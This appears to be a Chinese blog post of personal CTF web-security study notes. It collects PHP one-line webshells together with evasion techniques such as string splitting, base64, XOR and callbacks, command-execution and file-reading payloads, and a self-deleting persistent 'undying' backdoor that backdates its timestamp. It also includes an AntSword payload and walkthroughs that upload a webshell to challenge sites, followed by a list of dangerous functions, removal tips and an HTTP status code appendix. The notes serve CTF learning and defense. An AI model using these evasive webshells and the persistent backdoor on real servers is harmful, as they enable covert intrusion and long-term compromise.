2022.7.12 CTF WEB学习记录

WEB解题相关思路学习

一句话木马绕过思路

隐藏关键字

  • 绕过php代码标志 <? 的限制:
<script language="php">@eval($_POST['x'])</script>
  • 拆分拼接
<?php
$arr=explode(",","a,s,d,f,s,d,e,k,r,t"); //把字符串打散为数组
$payload=$arr[0].$arr[1].$arr[4].$arr[6].$arr[8].$arr[9];//拼接成assert
//php版本要求:<=7.0
@$payload(@$_GET['x']);
?>
  • 编码
<?php
    $a=base64_decode("YXNzZXJ0");
    @$a($_POST('cmd'));
?>
  • 随机异或,用异或运算来组成字符
<?php
//也可以用十六进制进行进一步加密,例如
//$r="x4d"^"x3f";
$a="Y"^"8";//a
$b="T"^"'";//s
$c="*"^"O";//e
$d="M"^"?";//r
$e="-"^"Y";//t
$payload=$a.$b.$b.$c.$d.$e;//拼接成assert
@$payload(@$_POST['x']);
?>
  • 可变函数
<?php
@$_REQUEST['e'](@$_REQUEST['x']);
//传入e=assert&x=command
?>
  • 可变变量
<?php
$a='assert';
$b='a';
//$$b=$a='assert'
$$b($_POST['x']); //assert($_POST['x'])
?>

回调函数

回调函数:PHP是将函数以string形式传递的。可以使用任何内置或用户自定义函数,但除了语言结构例如:array(),echo,empty(),eval(),exit(),isset(),list(),print 或 unset()。

call_user_func ( $callback , $parameter)

$callback :被调用的回调函数

$parameter:0个或以上的参数,被传入回调函数。

<?php  
 @call_user_func($_GET['id'],$_POST['a']);
 //传入id=eval&a=command
?>

类似的还有call_user_func_array、array_filter、

register_tick_function、

forward_static_call。。。

一句话木马(攻击方式)

https://blog.csdn.net/weixin_39190897/article/details/86772765

执行系统命令

system()--执行外部程序,并显示输出

cmd=system("ls /");

passthru()--执行外部程序并且显示原始输出

cmd=passthru("ls /");

exec()--执行一个外部程序,不输出结果,echo返回结果的最后一行。

cmd=echo exec("ls /");
    //只输出最后一行

shell_exec()或 --通过shell环境执行命令,需要echo

cmd=echo shell_exec("ls /");

读文件

file_ get_contents 一将整个文件读入为一个字符串

cmd=echo file_get_contents("./a.txt");

file()一把整个文件读入一个数组

cmd=var_dump(file("./a.txt"));

注意,回显数组echo只显示Array,需要用var_dump()函数

readfile一读取一个文件,并写入到输出缓冲

cmd=readfile("./a.txt");

遍历目录

scandir() 函数返回一个指定目录中的文件和目录的数组

cmd=var_dump(scandir("/"));

一句话木马(防御)

检测危险函数

代码执行函数:

- eval

- assert

- pre_replace

- create_function

- 回调函数 call_user_func、call_user_func_array、register_tick_function、array_filter等等

命令执行函数:

- exec()--执行一个外部程序

- passthru()--执行外部程序并且显示原始输出

- proc_open()--执行一个命令,并且打开用来输入/输出的文件指针

- shell_exec()或 --通过shell环境执行命令

- system()--执行外部程序,并显示输出

- popen()--通过参数传递一条命令,并对popen打开的文件执行

文件操作函数:

- file_ get_contents 一将整个文件读入为一个字符串

- file_ put_ contents 一将一个字符串写入文件

- file()一把整个文件读入一个数组中

- fopen一打开文件或者URL

- move_ uploaded file 一将上传的文件移动到新位置

- readfile一读取一个文件,并写入到输出缓冲

- rename一重命名一个文件或目录

- rmdir一删除目录

- unlink & delete 一删除文件

包含函数

- require、require_once

- include、include_once

特殊函数

- phpinfo

- 变量覆盖 parse_str、extract

- .....................

D盾查杀

不死马

不死马即内存马,它无文件,但程序会永久的运行在PHP进程中,无限执行,很隐蔽不易被发现,也不容易被删除。

<?php 
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = './.index1.php';
$code = '<?php if(md5($_POST["pass"])=="5c44d3ed7462245f57b37f8fe2a3d5de"){@eval($_POST["cmd"]);} ?>';
//pass=nepnep 用法:pass=123456&cmd=command
while (1){
	file_put_contents($file,$code);
	system('touch -m -d "2018-12-01 09:10:12" .index1.php');
	usleep(5000);
}
?>

ignore_user_abort(true):此函数用来设置 客户机断开后是否会终止脚本的执行,设置成true,客户机断开后脚本仍然会执行。

set_time_limit(0):设置脚本最大执行时间,设为0表示没有限制。

unlink(FILE): 删除文件本身,起到隐蔽自身的作用。

usleep():延迟执行当前脚本若干微秒。

pass参数使用了MD5加密,防止木马被他人利用。

不死马的查杀:

1、重启服务,比如php 等web服务。

2、创建一个和不死马同名的文件夹。

3、删除相应进程。查出不死马进程PID后,用命令kill -9 PID 杀掉进程。

4、竞争写入删除不死马的文件,usleep的时间必须要小于不死马的延迟时间才会有效。

菜刀蚁剑

一句话木马的小马侵入成功后,开始植入大马

大致原理

发送的请求包中,cmd连接密码中再嵌套了一句eval函数,而真正传递命令的是随机参数,随机参数传递base64编码后的命令,传递给cmd后,进行了base64解码,服务器执行解码完的命令。

image.png

把随机参数传递的命令解码后,如右图:

大致意思为循环遍历路径下的文件。

@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out){return $out;};
function asoutput(){
$output=ob_get_contents();
ob_end_clean();
echo "2652a8a9cbcf";
echo @asenc($output);
echo "76c018cc86";}
ob_start();
try{
    $D=dirname($_SERVER["SCRIPT_FILENAME"]);
	if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
	$R="{$D}	";
	if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}
	else{$R.="/";}
	$R.="	";
	$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();
	$R.=php_uname();
	$R.="	{$s}";
	echo $R;;
}catch(Exception $e){
	echo "ERROR://".$e->getMessage();
};
asoutput();
die();

刷题练习

bugku- 网站被黑(目录遍历+爆破)

python3 dirsearch.py -u http://114.67.175.224:11669/

目录遍历得到shell.php

image.png

进去是这个界面

image.png

使用burp爆破

image.png

使用狙击手模式,根据相应包长度登录成功,得到最终flag

image-20220712105404668

xxx二手交易市场(文件上传漏洞+一句话木马)

1. 成功上传一句话木马

在上传图片抓包的时候,发现有一个base64传入。

image.png

image.png

image.png

他这边是用到了data协议,前面的内容不要动,我们把image的图片内容修改成一句话木马的base64格式上传即可。

<?php @eval($_POST['cmd']);?>

PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=

image.png

像这样,然后forward即可

2. 找到一句话木马路径

根据一句话木马的三段论(上传成功、找到路径、正常运行)

接下来是第二步

在相应包中找到了相应木马的路径,这边稍微注意的是这里用了‘\’转义符,后面要去掉

image.png

3. 一句话木马成功运行

尝试输入变量测试,ok,没问题。

image.png

接下来,开始使用蚁剑。

image.png

image.png

完事了。。。

附录

HTTP响应码大全

http状态返回代码 1xx(临时响应)
表示临时响应并需要请求者继续执行操作的状态代码。

http状态返回代码 代码 说明
100 (继续)请求者应当继续提出请求。服务器返回此代码表示已收到请求的第一部分,正在等待其余部分。
101 (切换协议)请求者已要求服务器切换协议,服务器已确认并准备切换。

http状态返回代码 2xx (成功)
表示成功处理了请求的状态代码。

http状态返回代码 代码 说明
200 (成功) 服务器已成功处理了请求。通常,这表示服务器提供了请求的网页。
201 (已创建) 请求成功并且服务器创建了新的资源。
202 (已接受) 服务器已接受请求,但尚未处理。
203 (非授权信息) 服务器已成功处理了请求,但返回的信息可能来自另一来源。
204 (无内容) 服务器成功处理了请求,但没有返回任何内容。
205 (重置内容)服务器成功处理了请求,但没有返回任何内容。
206 (部分内容) 服务器成功处理了部分 GET 请求。

http状态返回代码 3xx (重定向)
表示要完成请求,需要进一步操作。通常,这些状态代码用来重定向。

http状态返回代码 代码 说明
300 (多种选择) 针对请求,服务器可执行多种操作。服务器可根据请求者 (user agent) 选择一项操作,或提供操作列表供请求者选择。
301 (永久移动) 请求的网页已永久移动到新位置。服务器返回此响应(对 GET 或 HEAD 请求的响应)时,会自动将请求者转到新位置。
302 (临时移动) 服务器目前从不同位置的网页响应请求,但请求者应继续使用原有位置来进行以后的请求。
303 (查看其他位置)请求者应当对不同的位置使用单独的 GET 请求来检索响应时,服务器返回此代码。

304 (未修改)自从上次请求后,请求的网页未修改过。服务器返回此响应时,不会返回网页内容。
305 (使用代理)请求者只能使用代理访问请求的网页。如果服务器返回此响应,还表示请求者应使用代理。
307 (临时重定向) 服务器目前从不同位置的网页响应请求,但请求者应继续使用原有位置来进行以后的请求。

http状态返回代码 4xx(请求错误)
这些状态代码表示请求可能出错,妨碍了服务器的处理。

http状态返回代码 代码 说明
400 (错误请求)服务器不理解请求的语法。
401 (未授权)请求要求身份验证。对于需要登录的网页,服务器可能返回此响应。
403 (禁止)服务器拒绝请求。
404 (未找到)服务器找不到请求的网页。
405 (方法禁用)禁用请求中指定的方法。
406 (不接受)无法使用请求的内容特性响应请求的网页。
407 (需要代理授权)此状态代码与 401(未授权)类似,但指定请求者应当授权使用代理。
408 (请求超时) 服务器等候请求时发生超时。
409 (冲突) 服务器在完成请求时发生冲突。服务器必须在响应中包含有关冲突的信息。
410 (已删除) 如果请求的资源已永久删除,服务器就会返回此响应。
411 (需要有效长度)服务器不接受不含有效内容长度标头字段的请求。
412 (未满足前提条件)服务器未满足请求者在请求中设置的其中一个前提条件。
413 (请求实体过大)服务器无法处理请求,因为请求实体过大,超出服务器的处理能力。
414 (请求的 URI 过长)请求的 URI(通常为网址)过长,服务器无法处理。
415 (不支持的媒体类型)请求的格式不受请求页面的支持。
416 (请求范围不符合要求)如果页面无法提供请求的范围,则服务器会返回此状态代码。
417 (未满足期望值)服务器未满足"期望"请求标头字段的要求。

http状态返回代码 5xx(服务器错误)
这些状态代码表示服务器在尝试处理请求时发生内部错误。这些错误可能是服务器本身的错误,而不是请求出错。

http状态返回代码 代码 说明
500 (服务器内部错误) 服务器遇到错误,无法完成请求。
501 (尚未实施)服务器不具备完成请求的功能。例如,服务器无法识别请求方法时可能会返回此代码。
502 (错误网关)服务器作为网关或代理,从上游服务器收到无效响应。
503 (服务不可用)服务器目前无法使用(由于超载或停机维护)。通常,这只是暂时状态。
504 (网关超时) 服务器作为网关或代理,但是没有及时从上游服务器收到请求。
505 (HTTP 版本不受支持)服务器不支持请求中所用的 HTTP 协议版本。

一些常见的http状态返回代码为:

200 - 服务器成功返回网页
404 - 请求的网页不存在
503 - 服务不可用

解决burpsuite光标错位问题

image.png

字体设为黑体,大小设置为8的倍数,16,24,32,40,建议设置24。

解决抓包时频繁出现不相关包问题

抓包的时候经常会有detectportal.firefox.com的包,非常影响体验,这里提供解决方案

输入地址about:config

搜索network.captive-portal-service.enabled

将其设置为false即可。

image.png

posted @ 2022-07-19 21:52  yuezi2048  阅读(98)  评论(0编辑  收藏  举报